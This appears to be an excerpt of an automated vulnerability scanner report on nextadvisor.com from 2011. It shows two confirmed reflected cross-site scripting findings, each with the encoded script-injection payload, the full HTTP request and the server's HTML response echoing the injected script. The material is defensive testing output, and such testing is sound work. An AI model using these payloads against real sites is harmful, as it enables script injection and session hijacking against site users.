<li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000244)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/identity_theft_protection_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Identity Theft Protection FAQ</h1> <p>Frequently Asked Questions about Identity Theft Protection</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Identity Theft Protection:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="identity_theft_protection_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-bl..
- /internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00025B)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00025B)%3C/script%3E

/internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00025B)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00025B)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00025B)</script>

Request

GET /internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00025B)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/internet_fax/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:45 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6640
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", internet fax, online fax, internetfax, faxing, internet faxing, online faxing, rapidfax, MyFax, MetroFax, Nextiva Fax, RingCentral, GoDaddy, eFax, RapidFax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/internet_fax/'"--></style></script><script>netsparker(0x00025B)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00025B)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/internet_fax_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Internet Fax FAQ</h1> <p>Frequently Asked Questions about Internet Fax</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Internet Fax:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="internet_fax"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcateg..
- /internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000266)%3C/script%3E

/internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000266)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsp..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000266)</script>

Request

GET /internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/internet_fax/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6657
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", internet fax, online fax, internetfax, faxing, internet faxing, online faxing, rapidfax, MyFax, MetroFax, Nextiva Fax, RingCentral, GoDaddy, eFax, RapidFax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/internet_fax/index.php'"--></style></script><script>netsparker(0x000266)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000266)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> 